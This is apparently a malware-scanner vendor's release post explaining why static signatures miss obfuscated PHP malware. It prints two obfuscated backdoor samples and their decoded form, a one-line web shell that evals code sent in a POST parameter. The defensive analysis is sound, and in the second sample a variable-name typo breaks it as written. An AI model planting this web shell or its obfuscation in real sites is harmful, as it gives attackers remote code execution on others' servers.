Today we released the new version 1.24.13 of ISPProtect malware scanner.
It includes some new malware signatures and new heuristics for dynamic malware code of which we want to show you a new type of malware that is hard to recognize for static code scanners (like Hex signatures of virus scanners).
<?php
$code1="aWYoaXNzZXQoJF9QT1NUWyJxaXBqIl0pKXtAZXZhbCgkX1BPU1RbInFpcGoiXSk7ZXhpdDt9";
$sp9="st"."r_"."r"."ep"."la"."ce";
$nv7 = $sp9("vc","","cvcrvcevcavctvce_fvcuncvctivconvc");
$bd0=$sp9("vb","","bvbasvbe6vb4_dvbecvbovbde");
$ex5 = $nv7('', $bd0($code1));
$ex5();
in fact the above code is nothing other than a crypted version of the following:
<?php
if(isset($_POST["qipj"])){@eval($_POST["qipj"]);exit;}
As the key names can be any string, the base64 encoded string in the visible source code (aWYoaXNzZXQoJF9QT1NUWyJxaXBqIl0pKXtAZXZhbCgkX1BPU1RbInFpcGoiXSk7ZXhpdDt9) is dynamic and creating a hex signature for it does not make any sense.
In addition the replacement strings (here "vc" and "vb") can also be dynamic.
So the malware creator could change the code without effort to this one doing exactly the same:
<?php
$c01de1="aWYoIGlzc2V0KCRfUE9TVFsiYXZjcyJdKSl7QGV2YWwoJF9QT1NUWyJhdmNzIl0pO2V4aXQ7IH0=";
$sp2="s"."tr".""."_"."rep".""."l"."a"."c".""."e"."";
$avc7 = $sp2("234","","c234r234e234a234t234e_f234un234cti234on234");
$bd0=$sp2("567","","b567as567e65674_d567ec567o567de");
$v315 = $avc7('', $bd0($c01ode1));
$v315();
As you can see each line of the code has changed without affecting the result.
Marius Burkard has been working as a software developer for 20 years and has several years of experience as a server administrator. As one of the lead developers of the ISPConfig control panel and technical contact for several hundred web hosting customers, he has extensive experience with malware, hacked websites and the analysis of vulnerabilities.